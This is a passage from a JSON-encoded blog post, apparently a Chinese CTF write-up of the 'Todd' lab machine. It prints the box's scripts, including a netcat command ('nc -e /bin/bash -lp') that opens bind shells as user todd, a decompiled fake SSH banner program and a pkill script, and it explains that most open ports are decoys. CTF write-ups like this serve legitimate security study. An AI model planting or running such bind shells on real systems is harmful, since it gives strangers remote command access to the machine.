$1\n}\n\nfor i in $(seq 10)\ndo\n        a=$((RANDOM))\n        sleep 0.2\n        create_ssh $a &amp;\ndone\nroot@todd:\/opt# cat create_nc2.sh\n#!\/bin\/bash\n\ncreate_ssh(){\n        sudo -u todd nc -e \/bin\/bash -lp $1\n}\n\nfor i in $(seq 1)\ndo\n        a=$((RANDOM))\n        sleep 0.2\n        create_ssh 7066 &amp;\ndone\n<\/code><\/pre>\n<p>\u53cd\u7f16\u8bd1\u7684<code>fake_ssh<\/code><\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  puts(&quot;SSH-2.0-OpenSSH_9.9p1 Debian-3&quot;);\n  return 0;\n}<\/code><\/pre>\n<ul>\n<li>\u7a0b\u5e8f\u542f\u52a8\u540e\u7acb\u5373\u8f93\u51fa SSH \u670d\u52a1\u7684\u6807\u51c6\u63e1\u624b\u4fe1\u606f <code>SSH-2.0-OpenSSH_9.9p1 Debian-3<\/code>\uff0c\u968f\u540e\u9000\u51fa\u3002<\/li>\n<li>\u6a21\u62df\u4e86\u771f\u5b9e\u7684 SSH \u670d\u52a1\u54cd\u5e94\uff0c\u4f7f\u5ba2\u6237\u7aef\u8bef\u8ba4\u4e3a\u8fde\u63a5\u5230\u4e86 OpenSSH \u670d\u52a1\u5668<\/li>\n<\/ul>\n<p>\u6240\u4ee5\u524d\u9762\u90a3\u4e2a\u7edf\u8ba1\u7aef\u53e3\u9891\u7387\u7528\u5728\u4e86\u8fd9\u91cc\uff0c\u5176\u4ed6\u7684\u7aef\u53e3\u90fd\u662f\u5047\u7684\uff0c\u6bdb\u90fd\u6ca1\u6709\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u4ee5\u53ca<code>kill_todd.sh<\/code><\/p>\n<pre><code class=\"language-bash\">pkill -9 -u todd\n# \u4f7f\u7528 pkill \u5c06\u7ec8\u6b62 todd \u7684\u6240\u6709\u8fdb\u7a0b\u3002-9\uff1a\u4fe1\u53f7 9 \u4e5f\u79f0\u4e3aSIGKILL\uff0c\u65e0\u6cd5\u88ab\u5e95\u5c42\u8fdb\u7a0b\u201c\u6355\u83b7\u201d\uff0c\u56e0\u6b64\u4f1a\u5f3a\u5236\u8fdb\u7a0b\u9000\u51fa\u3002<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Todd Todd yyds\uff01\uff01\uff01\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Tod [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-915","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/915","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=915"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/915\/revisions"}],"predecessor-version":[{"id":916,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/915\/revisions\/916"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=915"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=915"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=915"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}